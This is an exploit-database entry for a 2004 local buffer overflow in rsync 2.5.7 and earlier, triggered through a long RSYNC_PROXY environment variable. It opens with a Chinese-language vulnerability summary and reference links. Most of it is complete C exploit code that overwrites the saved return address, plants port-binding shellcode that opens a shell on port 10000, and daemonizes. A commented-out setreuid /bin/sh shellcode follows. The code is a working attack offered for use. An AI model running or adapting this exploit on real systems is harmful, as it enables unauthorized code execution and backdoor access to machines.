https://www.exploit-db.com/exploits/152
https://www.securityfocus.com/bid/88206
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-040

rsync2.5.7及早期版本中socket.c的open_socket_out函数存在缓冲区溢出漏洞。本地用户借助一个长的RSYNC_PROXY环境变量导致服务拒绝（崩溃）和可能执行任意代码。

/* 
* rsync <= 2.5.7 Local Exploit
* Saved EIP on stack is overwritten with address of shellcode in memory
* Generally rsync is not setuid or setgid so just a local shell is of no use
* So i used a portbinding shellcode as a PoC of a different attack vector.
* RET is calculated dynamically so payload can be changed just by changing shellcode
* Tested on:
* [eos@Matrix my]$ uname -a
* Linux Matrix 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
* coded by: abhisek linuxmail org
* Special Thanks: n2n, Hirosh Joseph
*/

#include <stdio.h>
/* Includes for code to daemonize */
#include <signal.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <fcntl.h>
/****/
#define PATH "/usr/local/bin/rsync"
#define BUFF_SIZE 100
//#define RET 0xbffffdfb

/* 88 bytes portbinding shellcode - linux-x86
* - by bighawk (bighawk warfare com)
*
* This shellcode binds a shell on port 10000
* stdin, stdout and stderr are dupped. accept() arguments are sane.
*/
char shellcode[] =
"x31xdb" // xor ebx, ebx
"xf7xe3" // mul ebx
"xb0x66" // mov al, 102
"x53" // push ebx
"x43" // inc ebx
"x53" // push ebx
"x43" // inc ebx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"x4b" // dec ebx
"xcdx80" // int 80h
"x89xc7" // mov edi, eax
"x52" // push edx
"x66x68x27x10" // push word 4135
"x43" // inc ebx
"x66x53" // push bx
"x89xe1" // mov ecx, esp
"xb0x10" // mov al, 16
"x50" // push eax
"x51" // push ecx
"x57" // push edi
"x89xe1" // mov ecx, esp
"xb0x66" // mov al, 102
"xcdx80" // int 80h
"xb0x66" // mov al, 102
"xb3x04" // mov bl, 4
"xcdx80" // int 80h
"x50" // push eax
"x50" // push eax
"x57" // push edi
"x89xe1" // mov ecx, esp
"x43" // inc ebx
"xb0x66" // mov al, 102
"xcdx80" // int 80h
"x89xd9" // mov ecx, ebx
"x89xc3" // mov ebx, eax
"xb0x3f" // mov al, 63
"x49" // dec ecx
"xcdx80" // int 80h
"x41" // inc ecx
"xe2xf8" // loop lp
"x51" // push ecx
"x68x6ex2fx73x68" // push dword 68732f6eh
"x68x2fx2fx62x69" // push dword 69622f2fh
"x89xe3" // mov ebx, esp
"x51" // push ecx
"x53" // push ebx
"x89xe1" // mov ecx, esp
"xb0x0b" // mov al, 11
"xcdx80"; // int 80h
/* Shellcode by n2n [[email protected]] used for initial testing */
/*
char shellcode[]=
// setreuid(geteuid(),geteuid()), no use unless rsync is setuid, usually its not 
"x31xc0xb0x31xcdx80x93x89xd9x31xc0xb0x46xcdx80"
// setregid(getegid(),getegid()) 
"x31xc0xb0x32xcdx80x93x89xd9x31xc0xb0x47xcdx80"
// exec /bin/sh 
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x53x89xe1x31xd2xb0x0bxcdx80"
// exit() 
"x31xdbx89xd8xb0x01xcdx80";
*/
void handler(int sig) {
int stat;
pid_t pid;
while ((pid = waitpid(-1, &stat, WNOHANG)) > 0) { }
return;
}
void go_daemon() {
int i;
if(fork())
exit (0);
setsid();
i=open("/dev/null",O_RDWR);
dup2(i, 0);
dup2(i, 1);
dup2(i, 2);
close(i);
for (i=1;i<64;i++)
signal(i,SIG_IGN);
signal(SIGCHLD,handler);
}
int main(int argc,char *argv[]) {
char *buffer;
int size=BUFF_SIZE,i;
//unsigned long ret_addr=0xbffffffa;
unsigned long ret_addr=0xbffffffa;
//char *expbuff;
char *arg="localhost::rsync:getaddrinfo:XXX";
if(argc > 2) {
printf("USAGE:n%s BUFF_SIZEn",argv[0]);
exit(1);
}
if(argc == 2)
size=atoi(argv[1]);
buffer=(char*)malloc(size);
if(!buffer) {
printf("Error allocating memory on heapn");
exit(1);
}
ret_addr -= strlen(PATH);
ret_addr -= strlen(shellcode);
//ret_addr -= strlen(arg);
/*
expbuff=(char*)malloc(strlen(shellcode)+100);
if(!expbuff) {
printf("Error allocating memory on heapn");
exit(1);
}
memset(expbuff,0x90,strlen(shellcode)+100);
memcpy(expbuff+80,shellcode,strlen(shellcode));
expbuff[strlen(expbuff)-1]=0x00;
*/
for(i=0;i<size;i+=4) 
*(unsigned long*)(buffer+i)=ret_addr; 
memcpy(buffer,"XXX:",4);
buffer[strlen(buffer)-1]=0x00;
printf("Using BUFF_SIZE=%dnRET=%pn",size,ret_addr);
setenv("RSYNC_PROXY",buffer,1);
setenv("EGG",shellcode,1);
/* Daemonizing and executing /usr/local/bin/rsync */
go_daemon();
execl(PATH,PATH,arg,NULL);
return 0;
}


// milw0rm.com [2004-02-13]

来源:XF
名称:linux-rsync-opensocketout-bo(15108)
链接:http://xforce.iss.net/xforce/xfdb/15108
来源:VULN-DEV
名称:20040209rsync<=2.5.7localbufferoverflow(noroottoday:)
链接:http://archives.neohapsis.com/archives/vuln-dev/2004-q1/0091.html